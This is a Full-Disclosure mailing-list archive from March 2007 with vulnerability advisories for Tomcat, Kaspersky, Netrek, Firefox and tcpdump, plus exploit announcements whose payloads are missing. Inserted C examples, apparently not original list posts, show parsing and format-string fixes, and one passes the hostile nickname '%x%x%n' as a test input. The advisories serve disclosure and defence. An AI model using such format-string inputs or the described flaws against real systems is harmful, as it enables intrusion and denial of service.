> Significance: Very Critical

I'm very pro-disclosure. I do see a point in disclosing flaws in software or hardware we might use. I do see a point in reporting flaws in websites we rely on (banks, online shops).
Hey, there might even be a weak case for shaming security vendors, IT companies, or fellow professionals by exposing flaws on their sites; it's mean, but it may have some value.

But I'm puzzled as to what's the point in telling the world about a generic flaw in soup-maker's website, where - really - the number of people even marginally affected is truly negligible? Talk to them, tell them, have it fixed; if they're nice, they might even give you a gift of some sort (year's worth of instant noodles, I'm thinking). Blog it if you find it important to tell others about your achievement, but really, that's where it should end.

/mz

From mu-b at digit-labs.org Fri Mar 2 17:31:31 2007
From: mu-b at digit-labs.org (mu-b)
Date: Fri, 02 Mar 2007 17:31:31 +0000
Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit
Message-ID: <45E85F73.40401@digit-labs.org>

Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the latest). The vulnerability is a bog-standard stack based overflow in the call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).

---------------------------------------------------------------------------
(mu-b at digit-labs.org)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: maildisable-v4.pl
Type: text/x-perl
Size: 4188 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/1670b40b/attachment.bin

From zdi-disclosures at 3com.com Fri Mar 2 17:56:56 2007
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Fri, 2 Mar 2007 09:56:56 -0800
Subject: [Full-disclosure] ZDI-07-008: Apache Tomcat JK Web Server Connector Long URL Stack Overflow Vulnerability
Message-ID:

ZDI-07-008: Apache Tomcat JK Web Server Connector Long URL Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-008.html
March 2, 2007

-- CVE ID:
CVE-2007-0774

-- Affected Vendor:
Apache

-- Affected Products:
Tomcat JK Web Server Connector 1.2.19
Tomcat JK Web Server Connector 1.2.20
Tomcat 4.1.34
Tomcat 5.5.20

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since February 26, 2007 by Digital Vaccine protection filter ID 5152. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Tomcat JK Web Server Connector. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the URI handler for the mod_jk.so library, map_uri_to_worker(), defined in native/common/jk_uri_worker_map.c. When parsing a long URL request, the URI worker map routine performs an unsafe memory copy. This results in a stack overflow condition which can be leveraged to execute arbitrary code.

-- Vendor Response:
Apache has issued an update to correct this vulnerability.
More details can be found at: http://tomcat.apache.org/connectors-doc/miscellaneous/changelog.html -- Disclosure Timeline: 2007.02.16 - Vulnerability reported to vendor 2007.02.26 - Digital Vaccine released to TippingPoint customers 2007.03.02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From samuschie at yahoo.de Fri Mar 2 18:24:22 2007 From: samuschie at yahoo.de (SaMuschie) Date: Fri, 2 Mar 2007 19:24:22 +0100 (CET) Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day Message-ID: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +--------------------------------------- - -- - | SaMuschie Research Labs proudly presents . . . 
+------------------------------------------- -- - -
| Application: Woltlab Burning Board (wbb)
| Version: 2.3.6 (others not tested)
| Vuln./Exploit Type: CSRF/XSS
| Status: 0day
+----------------------------------------- -- - -
| Discovered by: Samenspender
| Released: 20070302
| SaMuschie Release Number: 5
+------------------------------- - -- -

CSRF/XSS Exploit:

cat < wetpussy.html
EOF

+----------------------------- -- -
| Lameness Disclaimer
+------------------------------------- - -- - -
| SaMuschie Research Labs was founded to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+---------------------------------- - -- - -

From labs-no-reply at idefense.com Fri Mar 2 18:35:21 2007
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 02 Mar 2007 13:35:21 -0500
Subject: [Full-disclosure] iDefense Security Advisory 03.02.07: Kaspersky AntiVirus UPX File Decompression DoS Vulnerability
Message-ID: <45E86E69.6040802@idefense.com>

Kaspersky AntiVirus UPX File Decompression DoS Vulnerability

iDefense Security Advisory 03.02.07
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 02, 2007

I. BACKGROUND

Kaspersky Antivirus is a popular client and gateway virus scanner for Unix
and Windows. UPX, the ultimate packer for executables, is a method for
compressing executable files to reduce their size on disk. For more
information, visit the vendor's site at the following URL.

http://www.kaspersky.com/

II. DESCRIPTION

Remote exploitation of a denial of service (DoS) vulnerability in Kaspersky
Lab's Antivirus could allow an attacker to conduct a DoS attack on a
targeted host.

The antivirus engine is vulnerable to a DoS condition when processing an
executable packed with UPX compression. Malformed compressed data causes
the decompression routine to enter an infinite loop. Specifically, a
negative data offset results in the same compressed data chunk being
processed endlessly.

III. ANALYSIS

Exploitation allows an attacker to conduct a DoS attack. If this attack is
conducted against an e-mail gateway running Kaspersky, legitimate clients
may be unable to send e-mail through the server.

The infinite loop being executed consists of a short sequence of
instructions, which results in maximum CPU usage. On a client desktop, the
infinite loop will render the machine nearly unusable. On a server, it
severely degrades the quality of service of other applications running.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Kaspersky
Labs Antivirus Engine version 6.0.1.411 for Windows and 5.5-10 for Linux.
Previous versions may also be affected. Any products that use the scanning
engine are also affected, which includes the Kaspersky e-mail gateway
scanner.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Kaspersky Lab reports that it has fixed this vulnerability as of February
7th, 2007. In addition, they stated the following.

"There is no need to download any special patches. All installed Kaspersky
Lab products are updated automatically through the regular
signature-update functionality. There is no need to contact Kaspersky Lab
to obtain this fix."

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

01/24/2007  Initial vendor notification
03/01/2007  Initial vendor response
03/02/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any part
of this alert in any other medium other than electronically, please e-mail
customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

From tbiehn at gmail.com Fri Mar 2 19:04:42 2007
From: tbiehn at gmail.com (T Biehn)
Date: Fri, 2 Mar 2007 14:04:42 -0500
Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit
In-Reply-To: <45E85F73.40401@digit-labs.org>
References: <45E85F73.40401@digit-labs.org>
Message-ID: <2d6724810703021104p2fd7f786udac77e5fe7a0d3ea@mail.gmail.com>

Stop Disclosin'

On 3/2/07, mu-b wrote:
>
> Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including
> the
> latest). The vulnerability is a bog-standard stack based overflow in the
> call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).
>
>
> ---------------------------------------------------------------------------
> (mu-b at digit-labs.org)
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
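The loop the iDefense Kaspersky advisory above describes (a negative data offset sending the decompressor back to the same chunk forever) is a general failure pattern in container parsers. The following is an added example, not code from Kaspersky, iDefense or UPX: the chunk format it walks is constructed for illustration, and walk_chunks(), rd_u16() and rd_i16() are hypothetical names. It shows the three guards such a loop needs: strictly forward progress, bounds checks, and an iteration cap.

```c
/* Added example; not code from Kaspersky, iDefense or UPX. The chunk
 * format is constructed for illustration: each chunk is
 *   u16 little-endian payload length
 *   i16 little-endian offset of the next chunk, relative to this chunk
 *   payload bytes
 * and the stream is complete when the next offset lands exactly on the
 * end of the buffer. A walker that just does pos += next revisits the
 * same chunk forever when next is zero or negative, which is the
 * failure mode the advisory describes. walk_chunks() refuses to. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_CHUNKS 4096   /* iteration cap: defence in depth even if the
                             forward-progress check were ever bypassed */

static uint16_t rd_u16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static int16_t rd_i16(const uint8_t *p)
{
    unsigned v = rd_u16(p);
    return (int16_t)(v < 0x8000u ? (int)v : (int)v - 0x10000);
}

/* Returns the number of chunks visited, or a negative code:
 *   -1  header or payload runs past the end of the buffer
 *   -2  next offset is zero or negative (would loop or go backwards)
 *   -3  iteration cap reached */
long walk_chunks(const uint8_t *buf, size_t n)
{
    size_t pos = 0;
    long count = 0;

    while (pos < n) {
        size_t len;
        int16_t next;

        if (count >= MAX_CHUNKS)
            return -3;
        if (n - pos < 4)                 /* truncated header */
            return -1;
        len = rd_u16(buf + pos);
        next = rd_i16(buf + pos + 2);
        if (len > n - pos - 4)           /* payload past end of buffer */
            return -1;

        /* The guard the vulnerable routine lacked: every step must move
         * strictly forward, so the loop is bounded by the buffer size. */
        if (next <= 0)
            return -2;
        if ((size_t)next > n - pos)      /* jump past end of buffer */
            return -1;

        /* ... decompress buf[pos + 4 .. pos + 4 + len) here ... */
        count++;
        pos += (size_t)next;
    }
    return count;
}

/* Constructed sample streams (two chunks each). */
const uint8_t SAMPLE_GOOD[] = {
    0x02, 0x00, 0x06, 0x00, 'a', 'b',   /* len 2, next +6 */
    0x01, 0x00, 0x05, 0x00, 'c'         /* len 1, next +5 (= end) */
};
const uint8_t SAMPLE_LOOPING[] = {
    0x02, 0x00, 0x06, 0x00, 'a', 'b',
    0x01, 0x00, 0xFA, 0xFF, 'c'         /* len 1, next -6: points back */
};
const size_t SAMPLE_GOOD_LEN = sizeof SAMPLE_GOOD;
const size_t SAMPLE_LOOPING_LEN = sizeof SAMPLE_LOOPING;

int main(void)
{
    printf("good stream: %ld chunks\n",
           walk_chunks(SAMPLE_GOOD, SAMPLE_GOOD_LEN));
    printf("looping stream: %ld\n",
           walk_chunks(SAMPLE_LOOPING, SAMPLE_LOOPING_LEN));
    return 0;
}
```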
From walt.williams at gmail.com Fri Mar 2 14:51:09 2007
From: walt.williams at gmail.com (Walt Williams)
Date: Fri, 2 Mar 2007 09:51:09 -0500
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To:
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
Message-ID: <1dfe5f1d0703020651t4fc0342ck6d55f042de375adf@mail.gmail.com>

http://2600.meetup.com/232/

On 3/1/07, Dude VanWinkle wrote:
> Does anyone know if there is a NYC 2600 group? I checked the site, but
> couldn't find any listings..
>
> -JP
>
> On 2/28/07, Steven McGrath wrote:
> > The March Chicago 2600 Meeting is near! The meeting will be Friday,
> > March 2nd at the Neighborhood Boys and Girls Club and will feature much
> > of the same usual fun that all of you have grown to expect!
> >
> > [Presentation Information]
> > - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> > - 10:00pm - How to build a public server (Maniac)
> > - After hours - Wii, Music, Socializing, etc.
> >
> > [General Information]
> > - Meeting Time: 7.00pm - Approx. 3-5am
> > - Meeting Date: Friday, March 2nd
> > - Place : 2501 W Irving Park Road, Chicago
> > - More Info : http://chicago2600.net
>

--
Walt

From aluigi at autistici.org Fri Mar 2 21:43:30 2007
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 2 Mar 2007 22:43:30 +0100
Subject: [Full-disclosure] Limited format string in Netrek 2.12.0
Message-ID: <20070302224330.c9769b1b.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Netrek
              http://www.netrek.org
Versions:     <= 2.12.0 (Vanilla server)
Platforms:    *nix and Windows
Bug:          format string
Exploitation: remote (in-game)
Date:         02 Mar 2007
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Netrek is a well known real-time strategy game inspired by Star Trek.

#######################################################################

======
2) Bug
======

The Vanilla server is affected by a format string vulnerability caused
by the calling of the pmessage2() function without the needed format
argument.

The bug is located in new_warning() and can be exploited through the
locking of a player (the attacker himself, too) who is using a malformed
nickname.

Note that the EVENTLOG switch must be enabled for exploiting this
vulnerability (default is disabled).

from ntserv/warning.c:

    void new_warning(int index, const char *fmt, ...)
    {
        char temp[150];
        va_list args;

        va_start(args, fmt);
        vsprintf(temp, fmt, args);
        ...
        if (eventlog) {
            char from_str[9]="WRN->\0\0\0";
            strcat(from_str, me->p_mapchars);
            /* temp (already rendered, nickname included) is passed
               where pmessage2() expects a format string */
            pmessage2(0, 0, from_str, me->p_no, temp);
        }

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/netrekfs.zip

#######################################################################

======
4) Fix
======

Version 2.12.1

#######################################################################

---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org

From security at mandriva.com Fri Mar 2 22:45:01 2007
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 02 Mar 2007 15:45:01 -0700
Subject: [Full-disclosure] [ MDKSA-2007:050-1 ] - Updated Firefox packages fix multiple vulnerabilities
Message-ID:

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:050-1
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : mozilla-firefox
 Date    : March 2, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A number of security vulnerabilities have been discovered and corrected
in the latest Mozilla Firefox program, version 1.5.0.10.

This update provides the latest Firefox to correct these issues.

Update:

A regression was found in the latest Firefox packages provided where
changes to library paths caused applications that depended on the NSS
libraries (such as Thunderbird and Evolution) to fail to start or fail
to load certain SSL-related security components. These new packages
correct that problem and we apologize for any inconvenience the
previous update may have caused.
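For Luigi Auriemma's Netrek advisory above, an added example (not Netrek code and not from the advisory) of the corrected call shape: the text derived from the nickname is passed as the argument of a literal "%s" format rather than as the format itself. post_message() stands in for pmessage2(); build_warning() and nickname_has_format_directive() are hypothetical names.

```c
/* Added example; not Netrek code and not from the advisory. It mirrors
 * the shape of the bug: a message routine whose last fixed argument is a
 * printf-style format, and a caller that holds already-rendered text
 * containing attacker-chosen characters (the locked player's nickname).
 * post_message() stands in for pmessage2(); build_warning() and
 * nickname_has_format_directive() are hypothetical names. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_MAX 150   /* same buffer size as temp[] in new_warning() */

/* Stand-in for pmessage2(): fmt is interpreted by vsnprintf(). */
static int post_message(char *out, size_t outsz, const char *from,
                        const char *fmt, ...)
{
    char body[MSG_MAX];
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(body, sizeof body, fmt, ap);
    va_end(ap);
    return snprintf(out, outsz, "%s %s", from, body);
}

/* The advisory's bug is the call
 *     pmessage2(0, 0, from_str, me->p_no, temp);
 * where temp already contains user text, so a '%' in a nickname is parsed
 * as a directive with no matching argument. The corrected shape is
 *     pmessage2(0, 0, from_str, me->p_no, "%s", temp);
 * which is what build_warning() does below. */
int build_warning(char *out, size_t outsz, const char *mapchars,
                  const char *nickname)
{
    char temp[MSG_MAX];
    char from_str[9] = "WRN->";   /* same 9-byte layout as the original */

    /* p_mapchars is a two-character player tag; bound the append anyway. */
    strncat(from_str, mapchars, sizeof from_str - strlen(from_str) - 1);

    /* Render the warning with a literal format; the nickname is data. */
    snprintf(temp, sizeof temp, "Locked on to %s", nickname);

    /* Literal "%s" format with temp as its argument: never interpreted. */
    return post_message(out, outsz, from_str, "%s", temp);
}

/* Defensive check for nickname registration: a name carrying printf
 * directives has no legitimate use, so reject it at the door as well. */
int nickname_has_format_directive(const char *nick)
{
    return strchr(nick, '%') != NULL;
}

int main(void)
{
    char out[256];

    build_warning(out, sizeof out, "Fa", "%x%x%n");
    printf("%s\n", out);   /* the directives survive as plain text */
    return 0;
}
```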
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0996
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092
http://www.mozilla.org/security/announce/2007/mfsa2007-01.html
http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
http://www.mozilla.org/security/announce/2007/mfsa2007-03.html
http://www.mozilla.org/security/announce/2007/mfsa2007-04.html
http://www.mozilla.org/security/announce/2007/mfsa2007-05.html
http://www.mozilla.org/security/announce/2007/mfsa2007-06.html
http://www.mozilla.org/security/announce/2007/mfsa2007-07.html
http://www.mozilla.org/security/announce/2007/mfsa2007-08.html
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.0:
Mandriva Linux 2007.0/X86_64:
Corporate 3.0:
Corporate 3.0/X86_64:
Corporate 4.0:
Corporate 4.0/X86_64:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From falco at gentoo.org Fri Mar 2 23:13:15 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sat, 3 Mar 2007 00:13:15 +0100
Subject: [Full-disclosure] [ GLSA 200703-04 ] Mozilla Firefox: Multiple vulnerabilities
Message-ID: <20070302231315.GA16853@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200703-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla Firefox: Multiple vulnerabilities
      Date: March 02, 2007
      Bugs: #165555
        ID: 200703-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been reported in Mozilla Firefox, some of
which may allow user-assisted arbitrary remote code execution.

Background
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla
Project.

Affected packages
=================

    -------------------------------------------------------------------
     Package                         /  Vulnerable  /     Unaffected
    -------------------------------------------------------------------
  1  www-client/mozilla-firefox         < 2.0.0.2     *>= 1.5.0.10
                                                        >= 2.0.0.2
  2  www-client/mozilla-firefox-bin     < 2.0.0.2     *>= 1.5.0.10
                                                        >= 2.0.0.2
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Tom Ferris reported a heap-based buffer overflow involving wide SVG
stroke widths that affects Mozilla Firefox 2 only. Various researchers
reported some errors in the JavaScript engine potentially leading to
memory corruption. Mozilla Firefox also contains minor vulnerabilities
involving cache collision and unsafe pop-up restrictions, filtering or
CSS rendering under certain conditions.

Impact
======

An attacker could entice a user to view a specially crafted web page
that will trigger one of the vulnerabilities, possibly leading to the
execution of arbitrary code. It is also possible for an attacker to
spoof the address bar, steal information through cache collision, bypass
the local files protection mechanism with pop-ups, or perform cross-site
scripting attacks, leading to the exposure of sensitive information,
like user credentials.

Workaround
==========

There is no known workaround at this time for all of these issues, but
most of them can be avoided by disabling JavaScript.

Resolution
==========

Users upgrading to the following releases of Mozilla Firefox should note
that this upgrade has been found to lose the saved passwords file in
some cases. The saved passwords are encrypted and stored in the
'signons.txt' file of ~/.mozilla/ and we advise our users to save that
file before performing the upgrade.

All Mozilla Firefox 1.5 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-1.5.0.10"

All Mozilla Firefox 1.5 binary users should upgrade to the latest
version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-1.5.0.10"

All Mozilla Firefox 2.0 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.2"

All Mozilla Firefox 2.0 binary users should upgrade to the latest
version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.2"

References
==========

  [ 1 ] CVE-2006-6077
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
  [ 2 ] CVE-2007-0775
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
  [ 3 ] CVE-2007-0776
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
  [ 4 ] CVE-2007-0777
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
  [ 5 ] CVE-2007-0778
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
  [ 6 ] CVE-2007-0779
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
  [ 7 ] CVE-2007-0780
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
  [ 8 ] CVE-2007-0800
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
  [ 9 ] CVE-2007-0801
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0801
  [ 10 ] CVE-2007-0981
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
  [ 11 ] CVE-2007-0995
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
  [ 12 ] Mozilla password loss bug
        https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c366

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From falco at gentoo.org Sat Mar 3 16:34:19 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sat, 3 Mar 2007 17:34:19 +0100
Subject: [Full-disclosure] [ GLSA 200703-05 ] Mozilla Suite: Multiple vulnerabilities
Message-ID: <20070303163419.GB8439@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200703-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla Suite: Multiple vulnerabilities
      Date: March 03, 2007
      Bugs: #135257
        ID: 200703-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Several vulnerabilities exist in the Mozilla Suite, which is no longer
supported by the Mozilla project.
Background
==========

The Mozilla Suite is a popular all-in-one web browser that includes a
mail and news reader.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /          Unaffected
    -------------------------------------------------------------------
  1  www-client/mozilla            <= 1.7.13                 Vulnerable!
  2  www-client/mozilla-bin        <= 1.7.13                 Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their architecture
           maintainers.
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Several vulnerabilities ranging from code execution with elevated
privileges to information leaks affect the Mozilla Suite.

Impact
======

A remote attacker could entice a user to browse to a specially crafted
website or open a specially crafted mail that could trigger some of the
vulnerabilities, potentially allowing execution of arbitrary code,
denials of service, information leaks, or cross-site scripting attacks
leading to the robbery of cookies or authentication credentials.

Workaround
==========

Most of the issues, but not all of them, can be prevented by disabling
the HTML rendering in the mail client and JavaScript on every
application.

Resolution
==========

The Mozilla Suite is no longer supported and has been masked after some
necessary changes on all the other ebuilds which used to depend on it.
Mozilla Suite users should unmerge www-client/mozilla or
www-client/mozilla-bin, and switch to a supported product, like
SeaMonkey, Thunderbird or Firefox.

    # emerge --unmerge "www-client/mozilla"
    # emerge --unmerge "www-client/mozilla-bin"

References
==========

  [ 1 ] Official Advisory
        http://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From announce-noreply at rpath.com Sat Mar 3 14:13:03 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Sat, 03 Mar 2007 09:13:03 -0500
Subject: [Full-disclosure] rPSA-2007-0048-1 tcpdump
Message-ID: <45e9826f.IDuL/PXXLBSOh6LT%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0048-1
Published: 2007-03-03
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Remote User Deterministic Denial of Service
Updated Versions:
    tcpdump=/conary.rpath.com at rpl:devel//1/3.9.5-0.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218
    https://issues.rpath.com/browse/RPL-1100

Description:
    Previous versions of the tcpdump package are vulnerable to a remote
    denial of service when printing 802.11 ethernet frames, only if the
    link type was specified explicitly on the tcpdump command line. No
    unauthorized access is understood to be enabled by this
    vulnerability.

From announce-noreply at rpath.com Sat Mar 3 14:15:51 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Sat, 03 Mar 2007 09:15:51 -0500
Subject: [Full-disclosure] rPSA-2007-0040-3 firefox thunderbird
Message-ID: <45e98317.YlMP32diPSAISo2N%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0040-3
Published: 2007-02-26
Updated:
    2007-02-26 Correctly formatted CVE URLs
    2007-03-03 Added newly-released thunderbird packages to advisory
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    firefox=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1
    thunderbird=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
